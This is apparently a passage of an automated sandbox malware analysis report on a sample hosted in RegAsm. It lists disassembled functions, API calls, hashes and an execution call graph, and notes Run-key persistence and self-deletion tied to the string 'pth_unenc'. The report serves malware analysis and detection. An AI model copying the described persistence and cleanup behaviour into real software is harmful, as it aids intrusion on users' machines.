                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Init_thread_footer__onexit
                                                                                                                                  • String ID: ,kG$0kG
                                                                                                                                  • API String ID: 1881088180-2015055088
                                                                                                                                  • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                                                                  • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                                                                                  • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                                                                  • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                                                                                  Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DeleteOpenValue
                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                  • API String ID: 2654517830-1051519024
                                                                                                                                  • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                  • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                                                                  • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                  • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                                                                  Function 0040B8A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DeleteDirectoryFileRemove
                                                                                                                                  • String ID: pth_unenc
                                                                                                                                  • API String ID: 3325800564-4028850238
                                                                                                                                  • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                                                  • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                                                                                  • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                                                  • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                                                                                  Function 0041288B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectProcessSingleTerminateWait
                                                                                                                                  • String ID: pth_unenc
                                                                                                                                  • API String ID: 1872346434-4028850238
                                                                                                                                  • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                                                                  • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                                                                                                  • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                                                                  • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                                                                                                  Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                                                                                  • GetLastError.KERNEL32 ref: 00440D85
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1717984340-0
                                                                                                                                  • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                                                  • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                                                                  • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                                                  • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                                                                  Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                                                                                  • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4100373531-0
                                                                                                                                  • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                                  • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                                                                  • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                                  • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:6%
                                                                                                                                  Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:2000
                                                                                                                                  Total number of Limit Nodes:66
                                                                                                                                  execution_graph 37908 44660a 37911 4465e4 37908->37911 37910 446613 37912 4465f3 __dllonexit 37911->37912 37913 4465ed _onexit 37911->37913 37912->37910 37913->37912 37700 442ec6 19 API calls 37877 4152c6 malloc 37878 4152e2 37877->37878 37879 4152ef 37877->37879 37881 416760 11 API calls 37879->37881 37881->37878 37882 4232e8 37883 4232ef 37882->37883 37886 415b2c 37883->37886 37885 423305 37887 415b42 37886->37887 37890 415b46 37886->37890 37888 415b94 37887->37888 37887->37890 37891 415b5a 37887->37891 37893 4438b5 37888->37893 37890->37885 37891->37890 37892 415b79 memcpy 37891->37892 37892->37890 37894 4438d0 37893->37894 37906 4438c9 37893->37906 37907 415378 memcpy memcpy 37894->37907 37906->37890 37914 4466f4 37933 446904 37914->37933 37916 446700 GetModuleHandleA 37919 446710 __set_app_type __p__fmode __p__commode 37916->37919 37918 4467a4 37920 4467ac __setusermatherr 37918->37920 37921 4467b8 37918->37921 37919->37918 37920->37921 37934 4468f0 _controlfp 37921->37934 37923 4467bd _initterm GetEnvironmentStringsW _initterm 37924 44681e GetStartupInfoW 37923->37924 37925 446810 37923->37925 37927 446866 GetModuleHandleA 37924->37927 37935 41276d 37927->37935 37931 446896 exit 37932 44689d _cexit 37931->37932 37932->37925 37933->37916 37934->37923 37936 41277d 37935->37936 37978 4044a4 LoadLibraryW 37936->37978 37938 412785 37939 412789 37938->37939 37984 414b81 37938->37984 37939->37931 37939->37932 37942 4127c8 37988 412465 memset ??2@YAPAXI 37942->37988 37944 4127ea 38000 40ac21 37944->38000 37949 412813 38018 40dd07 memset 37949->38018 37950 412827 38023 40db69 memset 37950->38023 37953 412822 38045 4125b6 ??3@YAXPAX DeleteObject 37953->38045 37955 40ada2 _wcsicmp 37956 41283d 37955->37956 37956->37953 37959 412863 CoInitialize 37956->37959 38028 41268e 37956->38028 37958 412966 38046 40b1ab free free 37958->38046 38044 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37959->38044 37963 41296f 38047 40b633 37963->38047 37965 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37970 412957 CoUninitialize 37965->37970 37975 4128ca 37965->37975 37970->37953 37971 4128d0 TranslateAcceleratorW 37972 412941 GetMessageW 37971->37972 37971->37975 37972->37970 37972->37971 37973 412909 IsDialogMessageW 37973->37972 37973->37975 37974 4128fd IsDialogMessageW 37974->37972 37974->37973 37975->37971 37975->37973 37975->37974 37976 41292b TranslateMessage DispatchMessageW 37975->37976 37977 41291f IsDialogMessageW 37975->37977 37976->37972 37977->37972 37977->37976 37979 4044f3 37978->37979 37983 4044cf FreeLibrary 37978->37983 37981 404507 MessageBoxW 37979->37981 37982 40451e 37979->37982 37981->37938 37982->37938 37983->37979 37985 414b8a 37984->37985 37986 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37984->37986 38051 40a804 memset 37985->38051 37986->37942 37989 4124e0 37988->37989 37990 412505 ??2@YAPAXI 37989->37990 37991 412521 37990->37991 37992 41251c 37990->37992 38062 444722 37991->38062 38073 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37992->38073 37999 41259b wcscpy 37999->37944 38078 40b1ab free free 38000->38078 38002 40ad76 38079 40aa04 38002->38079 38005 40a9ce malloc memcpy free free 38008 40ac5c 38005->38008 38006 40ad4b 38006->38002 38102 40a9ce 38006->38102 38008->38002 38008->38005 38008->38006 38009 40ace7 free 38008->38009 38082 40a8d0 38008->38082 38094 4099f4 38008->38094 38009->38008 38013 40a8d0 7 API calls 38013->38002 38014 40ada2 38016 40adc9 38014->38016 38017 40adaa 38014->38017 38015 40adb3 _wcsicmp 38015->38016 38015->38017 38016->37949 38016->37950 38017->38015 38017->38016 38107 40dce0 38018->38107 38020 40dd3a GetModuleHandleW 38112 40dba7 38020->38112 38024 40dce0 3 API calls 38023->38024 38025 40db99 38024->38025 38184 40dae1 38025->38184 38198 402f3a 38028->38198 38030 412766 38030->37953 38030->37959 38031 4126d3 _wcsicmp 38032 4126a8 38031->38032 38032->38030 38032->38031 38034 41270a 38032->38034 38233 4125f8 7 API calls 38032->38233 38034->38030 38201 411ac5 38034->38201 38044->37965 38045->37958 38046->37963 38048 40b640 38047->38048 38049 40b639 free 38047->38049 38050 40b1ab free free 38048->38050 38049->38048 38050->37939 38052 40a83b GetSystemDirectoryW 38051->38052 38053 40a84c wcscpy 38051->38053 38052->38053 38058 409719 wcslen 38053->38058 38056 40a881 LoadLibraryW 38057 40a886 38056->38057 38057->37986 38059 409724 38058->38059 38060 409739 wcscat LoadLibraryW 38058->38060 38059->38060 38061 40972c wcscat 38059->38061 38060->38056 38060->38057 38061->38060 38063 444732 38062->38063 38064 444728 DeleteObject 38062->38064 38074 409cc3 38063->38074 38064->38063 38066 412551 38067 4010f9 38066->38067 38068 401130 38067->38068 38069 401134 GetModuleHandleW LoadIconW 38068->38069 38070 401107 wcsncat 38068->38070 38071 40a7be 38069->38071 38070->38068 38072 40a7d2 38071->38072 38072->37999 38072->38072 38073->37991 38077 409bfd memset wcscpy 38074->38077 38076 409cdb CreateFontIndirectW 38076->38066 38077->38076 38078->38008 38080 40aa14 38079->38080 38081 40aa0a free 38079->38081 38080->38014 38081->38080 38083 40a8eb 38082->38083 38084 40a8df wcslen 38082->38084 38085 40a906 free 38083->38085 38086 40a90f 38083->38086 38084->38083 38087 40a919 38085->38087 38088 4099f4 3 API calls 38086->38088 38089 40a932 38087->38089 38090 40a929 free 38087->38090 38088->38087 38092 4099f4 3 API calls 38089->38092 38091 40a93e memcpy 38090->38091 38091->38008 38093 40a93d 38092->38093 38093->38091 38095 409a41 38094->38095 38096 4099fb malloc 38094->38096 38095->38008 38098 409a37 38096->38098 38099 409a1c 38096->38099 38098->38008 38100 409a30 free 38099->38100 38101 409a20 memcpy 38099->38101 38100->38098 38101->38100 38103 40a9e7 38102->38103 38104 40a9dc free 38102->38104 38105 4099f4 3 API calls 38103->38105 38106 40a9f2 38104->38106 38105->38106 38106->38013 38131 409bca GetModuleFileNameW 38107->38131 38109 40dce6 wcsrchr 38110 40dcf5 38109->38110 38111 40dcf9 wcscat 38109->38111 38110->38111 38111->38020 38132 44db70 38112->38132 38116 40dbfd 38135 4447d9 38116->38135 38119 40dc34 wcscpy wcscpy 38161 40d6f5 38119->38161 38120 40dc1f wcscpy 38120->38119 38123 40d6f5 3 API calls 38124 40dc73 38123->38124 38125 40d6f5 3 API calls 38124->38125 38126 40dc89 38125->38126 38127 40d6f5 3 API calls 38126->38127 38128 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38127->38128 38167 40da80 38128->38167 38131->38109 38133 40dbb4 memset memset 38132->38133 38134 409bca GetModuleFileNameW 38133->38134 38134->38116 38137 4447f4 38135->38137 38136 40dc1b 38136->38119 38136->38120 38137->38136 38138 444807 ??2@YAPAXI 38137->38138 38139 44481f 38138->38139 38140 444873 _snwprintf 38139->38140 38141 4448ab wcscpy 38139->38141 38174 44474a 8 API calls 38140->38174 38143 4448bb 38141->38143 38175 44474a 8 API calls 38143->38175 38144 4448a7 38144->38141 38144->38143 38146 4448cd 38176 44474a 8 API calls 38146->38176 38148 4448e2 38177 44474a 8 API calls 38148->38177 38150 4448f7 38178 44474a 8 API calls 38150->38178 38152 44490c 38179 44474a 8 API calls 38152->38179 38154 444921 38180 44474a 8 API calls 38154->38180 38156 444936 38181 44474a 8 API calls 38156->38181 38158 44494b 38182 44474a 8 API calls 38158->38182 38160 444960 ??3@YAXPAX 38160->38136 38162 44db70 38161->38162 38163 40d702 memset GetPrivateProfileStringW 38162->38163 38164 40d752 38163->38164 38165 40d75c WritePrivateProfileStringW 38163->38165 38164->38165 38166 40d758 38164->38166 38165->38166 38166->38123 38168 44db70 38167->38168 38169 40da8d memset 38168->38169 38170 40daac LoadStringW 38169->38170 38171 40dac6 38170->38171 38171->38170 38172 40dade 38171->38172 38183 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38171->38183 38172->37953 38174->38144 38175->38146 38176->38148 38177->38150 38178->38152 38179->38154 38180->38156 38181->38158 38182->38160 38183->38171 38194 409b98 GetFileAttributesW 38184->38194 38186 40daea 38187 40db63 38186->38187 38188 40daef wcscpy wcscpy GetPrivateProfileIntW 38186->38188 38187->37955 38195 40d65d GetPrivateProfileStringW 38188->38195 38190 40db3e 38196 40d65d GetPrivateProfileStringW 38190->38196 38192 40db4f 38197 40d65d GetPrivateProfileStringW 38192->38197 38194->38186 38195->38190 38196->38192 38197->38187 38234 40eaff 38198->38234 38202 411ae2 memset 38201->38202 38203 411b8f 38201->38203 38275 409bca GetModuleFileNameW 38202->38275 38215 411a8b 38203->38215 38205 411b0a wcsrchr 38206 411b22 wcscat 38205->38206 38207 411b1f 38205->38207 38276 414770 wcscpy wcscpy wcscpy CloseHandle 38206->38276 38207->38206 38209 411b67 38277 402afb 38209->38277 38213 411b7f 38333 40ea13 SendMessageW memset SendMessageW 38213->38333 38216 402afb 27 API calls 38215->38216 38217 411ac0 38216->38217 38218 4110dc 38217->38218 38219 41113e 38218->38219 38224 4110f0 38218->38224 38358 40969c LoadCursorW SetCursor 38219->38358 38221 411143 38232 40b04b ??3@YAXPAX 38221->38232 38359 4032b4 38221->38359 38377 444a54 38221->38377 38222 4110f7 _wcsicmp 38222->38224 38223 411157 38225 40ada2 _wcsicmp 38223->38225 38224->38219 38224->38222 38380 410c46 10 API calls 38224->38380 38228 411167 38225->38228 38226 4111af 38228->38226 38229 4111a6 qsort 38228->38229 38229->38226 38232->38223 38233->38032 38235 40eb10 38234->38235 38248 40e8e0 38235->38248 38238 40eb6c memcpy memcpy 38239 40ebe1 38238->38239 38245 40ebb7 38238->38245 38239->38238 38241 40ebf2 ??2@YAPAXI ??2@YAPAXI 38239->38241 38240 40d134 16 API calls 38240->38245 38242 40ec2e ??2@YAPAXI 38241->38242 38246 40ec65 38241->38246 38242->38246 38245->38239 38245->38240 38246->38246 38258 40ea7f 38246->38258 38247 402f49 38247->38032 38249 40e8f2 38248->38249 38250 40e8eb ??3@YAXPAX 38248->38250 38251 40e900 38249->38251 38252 40e8f9 ??3@YAXPAX 38249->38252 38250->38249 38253 40e911 38251->38253 38254 40e90a ??3@YAXPAX 38251->38254 38252->38251 38255 40e931 ??2@YAPAXI ??2@YAPAXI 38253->38255 38256 40e921 ??3@YAXPAX 38253->38256 38257 40e92a ??3@YAXPAX 38253->38257 38254->38253 38255->38238 38256->38257 38257->38255 38259 40aa04 free 38258->38259 38260 40ea88 38259->38260 38261 40aa04 free 38260->38261 38262 40ea90 38261->38262 38263 40aa04 free 38262->38263 38264 40ea98 38263->38264 38265 40aa04 free 38264->38265 38266 40eaa0 38265->38266 38267 40a9ce 4 API calls 38266->38267 38268 40eab3 38267->38268 38269 40a9ce 4 API calls 38268->38269 38270 40eabd 38269->38270 38271 40a9ce 4 API calls 38270->38271 38272 40eac7 38271->38272 38273 40a9ce 4 API calls 38272->38273 38274 40ead1 38273->38274 38274->38247 38275->38205 38276->38209 38334 40b2cc 38277->38334 38279 402b0a 38280 40b2cc 27 API calls 38279->38280 38281 402b23 38280->38281 38282 40b2cc 27 API calls 38281->38282 38283 402b3a 38282->38283 38284 40b2cc 27 API calls 38283->38284 38285 402b54 38284->38285 38286 40b2cc 27 API calls 38285->38286 38287 402b6b 38286->38287 38288 40b2cc 27 API calls 38287->38288 38289 402b82 38288->38289 38290 40b2cc 27 API calls 38289->38290 38291 402b99 38290->38291 38292 40b2cc 27 API calls 38291->38292 38293 402bb0 38292->38293 38294 40b2cc 27 API calls 38293->38294 38295 402bc7 38294->38295 38296 40b2cc 27 API calls 38295->38296 38297 402bde 38296->38297 38298 40b2cc 27 API calls 38297->38298 38299 402bf5 38298->38299 38300 40b2cc 27 API calls 38299->38300 38301 402c0c 38300->38301 38302 40b2cc 27 API calls 38301->38302 38303 402c23 38302->38303 38304 40b2cc 27 API calls 38303->38304 38305 402c3a 38304->38305 38306 40b2cc 27 API calls 38305->38306 38307 402c51 38306->38307 38308 40b2cc 27 API calls 38307->38308 38309 402c68 38308->38309 38310 40b2cc 27 API calls 38309->38310 38311 402c7f 38310->38311 38312 40b2cc 27 API calls 38311->38312 38313 402c99 38312->38313 38314 40b2cc 27 API calls 38313->38314 38315 402cb3 38314->38315 38316 40b2cc 27 API calls 38315->38316 38317 402cd5 38316->38317 38318 40b2cc 27 API calls 38317->38318 38319 402cf0 38318->38319 38320 40b2cc 27 API calls 38319->38320 38321 402d0b 38320->38321 38322 40b2cc 27 API calls 38321->38322 38323 402d26 38322->38323 38324 40b2cc 27 API calls 38323->38324 38325 402d3e 38324->38325 38326 40b2cc 27 API calls 38325->38326 38327 402d59 38326->38327 38328 40b2cc 27 API calls 38327->38328 38329 402d78 38328->38329 38330 40b2cc 27 API calls 38329->38330 38331 402d93 38330->38331 38332 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38331->38332 38332->38213 38333->38203 38337 40b58d 38334->38337 38336 40b2d1 38336->38279 38338 40b5a4 GetModuleHandleW FindResourceW 38337->38338 38339 40b62e 38337->38339 38340 40b5c2 LoadResource 38338->38340 38342 40b5e7 38338->38342 38339->38336 38341 40b5d0 SizeofResource LockResource 38340->38341 38340->38342 38341->38342 38342->38339 38350 40afcf 38342->38350 38344 40b608 memcpy 38353 40b4d3 memcpy 38344->38353 38346 40b61e 38354 40b3c1 18 API calls 38346->38354 38348 40b626 38355 40b04b 38348->38355 38351 40b04b ??3@YAXPAX 38350->38351 38352 40afd7 ??2@YAPAXI 38351->38352 38352->38344 38353->38346 38354->38348 38356 40b051 ??3@YAXPAX 38355->38356 38357 40b05f 38355->38357 38356->38357 38357->38339 38358->38221 38360 4032c4 38359->38360 38361 40b633 free 38360->38361 38362 403316 38361->38362 38381 44553b 38362->38381 38366 403480 38579 40368c 15 API calls 38366->38579 38368 403489 38369 40b633 free 38368->38369 38371 403495 38369->38371 38370 40333c 38370->38366 38372 4033a9 memset memcpy 38370->38372 38373 4033ec wcscmp 38370->38373 38577 4028e7 11 API calls 38370->38577 38578 40f508 6 API calls 38370->38578 38371->38223 38372->38370 38372->38373 38373->38370 38375 403421 _wcsicmp 38375->38370 38378 444a64 FreeLibrary 38377->38378 38379 444a83 38377->38379 38378->38379 38379->38223 38380->38224 38382 445548 38381->38382 38383 445599 38382->38383 38580 40c768 38382->38580 38384 4455a8 memset 38383->38384 38526 4457f2 38383->38526 38664 403988 38384->38664 38390 4455e5 38399 445672 38390->38399 38409 44560f 38390->38409 38392 4458bb memset memset 38396 414c2e 16 API calls 38392->38396 38394 4459ed 38400 445a00 memset memset 38394->38400 38401 445b22 38394->38401 38395 44595e memset memset 38402 414c2e 16 API calls 38395->38402 38403 4458f9 38396->38403 38397 44557a 38404 44558c 38397->38404 38644 4136c0 38397->38644 38675 403fbe memset memset memset memset memset 38399->38675 38406 414c2e 16 API calls 38400->38406 38411 445bca 38401->38411 38412 445b38 memset memset memset 38401->38412 38407 44599c 38402->38407 38408 40b2cc 27 API calls 38403->38408 38648 444b06 38404->38648 38416 445a3e 38406->38416 38418 40b2cc 27 API calls 38407->38418 38419 445909 38408->38419 38421 4087b3 335 API calls 38409->38421 38420 445c8b memset memset 38411->38420 38477 445cf0 38411->38477 38424 445bd4 38412->38424 38425 445b98 38412->38425 38413 445849 38858 40b1ab free free 38413->38858 38426 40b2cc 27 API calls 38416->38426 38434 4459ac 38418->38434 38430 409d1f 6 API calls 38419->38430 38435 414c2e 16 API calls 38420->38435 38431 445621 38421->38431 38423 44589f 38859 40b1ab free free 38423->38859 38813 414c2e 38424->38813 38425->38424 38437 445ba2 38425->38437 38439 445a4f 38426->38439 38429 403335 38576 4452e5 43 API calls 38429->38576 38445 445919 38430->38445 38844 4454bf 20 API calls 38431->38844 38432 445823 38432->38413 38454 4087b3 335 API calls 38432->38454 38433 445854 38440 4458aa 38433->38440 38790 403c9c memset memset memset memset memset 38433->38790 38446 409d1f 6 API calls 38434->38446 38447 445cc9 38435->38447 38949 4099c6 wcslen 38437->38949 38438 4456b2 38846 40b1ab free free 38438->38846 38451 409d1f 6 API calls 38439->38451 38440->38392 38473 44594a 38440->38473 38443 445d3d 38472 40b2cc 27 API calls 38443->38472 38444 445d88 memset memset memset 38455 414c2e 16 API calls 38444->38455 38860 409b98 GetFileAttributesW 38445->38860 38456 4459bc 38446->38456 38457 409d1f 6 API calls 38447->38457 38448 445879 38448->38423 38467 4087b3 335 API calls 38448->38467 38450 445680 38450->38438 38698 4087b3 memset 38450->38698 38460 445a63 38451->38460 38452 40b2cc 27 API calls 38461 445bf3 38452->38461 38454->38432 38464 445dde 38455->38464 38925 409b98 GetFileAttributesW 38456->38925 38466 445ce1 38457->38466 38458 445bb3 38952 445403 memset 38458->38952 38470 40b2cc 27 API calls 38460->38470 38829 409d1f wcslen wcslen 38461->38829 38462 445928 38462->38473 38861 40b6ef 38462->38861 38474 40b2cc 27 API calls 38464->38474 38969 409b98 GetFileAttributesW 38466->38969 38467->38448 38479 445a94 38470->38479 38482 445d54 _wcsicmp 38472->38482 38473->38394 38473->38395 38485 445def 38474->38485 38475 4459cb 38475->38394 38492 40b6ef 249 API calls 38475->38492 38477->38429 38477->38443 38477->38444 38478 445389 255 API calls 38478->38411 38926 40ae18 38479->38926 38480 44566d 38480->38526 38749 413d4c 38480->38749 38489 445d71 38482->38489 38553 445d67 38482->38553 38484 445665 38845 40b1ab free free 38484->38845 38490 409d1f 6 API calls 38485->38490 38970 445093 23 API calls 38489->38970 38497 445e03 38490->38497 38492->38394 38493 4456d8 38499 40b2cc 27 API calls 38493->38499 38496 44563c 38496->38484 38502 4087b3 335 API calls 38496->38502 38971 409b98 GetFileAttributesW 38497->38971 38498 40b6ef 249 API calls 38498->38429 38504 4456e2 38499->38504 38500 40b2cc 27 API calls 38505 445c23 38500->38505 38501 445d83 38501->38429 38502->38496 38847 413fa6 _wcsicmp _wcsicmp 38504->38847 38509 409d1f 6 API calls 38505->38509 38507 445e12 38513 445e6b 38507->38513 38520 40b2cc 27 API calls 38507->38520 38511 445c37 38509->38511 38510 4456eb 38516 4456fd memset memset memset memset 38510->38516 38517 4457ea 38510->38517 38518 445389 255 API calls 38511->38518 38512 445b17 38946 40aebe 38512->38946 38973 445093 23 API calls 38513->38973 38848 409c70 wcscpy wcsrchr 38516->38848 38851 413d29 38517->38851 38524 445c47 38518->38524 38525 445e33 38520->38525 38522 445e7e 38527 445f67 38522->38527 38530 40b2cc 27 API calls 38524->38530 38531 409d1f 6 API calls 38525->38531 38526->38433 38767 403e2d memset memset memset memset memset 38526->38767 38533 40b2cc 27 API calls 38527->38533 38528 445ab2 memset 38534 40b2cc 27 API calls 38528->38534 38536 445c53 38530->38536 38532 445e47 38531->38532 38972 409b98 GetFileAttributesW 38532->38972 38538 445f73 38533->38538 38539 445aa1 38534->38539 38535 409c70 2 API calls 38540 44577e 38535->38540 38541 409d1f 6 API calls 38536->38541 38543 409d1f 6 API calls 38538->38543 38539->38512 38539->38528 38544 409d1f 6 API calls 38539->38544 38552 445389 255 API calls 38539->38552 38933 40add4 38539->38933 38938 40ae51 38539->38938 38545 409c70 2 API calls 38540->38545 38546 445c67 38541->38546 38542 445e56 38542->38513 38550 445e83 memset 38542->38550 38547 445f87 38543->38547 38544->38539 38548 44578d 38545->38548 38549 445389 255 API calls 38546->38549 38976 409b98 GetFileAttributesW 38547->38976 38548->38517 38555 40b2cc 27 API calls 38548->38555 38549->38411 38554 40b2cc 27 API calls 38550->38554 38552->38539 38553->38429 38553->38498 38556 445eab 38554->38556 38557 4457a8 38555->38557 38558 409d1f 6 API calls 38556->38558 38559 409d1f 6 API calls 38557->38559 38560 445ebf 38558->38560 38561 4457b8 38559->38561 38562 40ae18 9 API calls 38560->38562 38850 409b98 GetFileAttributesW 38561->38850 38570 445ef5 38562->38570 38564 4457c7 38564->38517 38566 4087b3 335 API calls 38564->38566 38565 40ae51 9 API calls 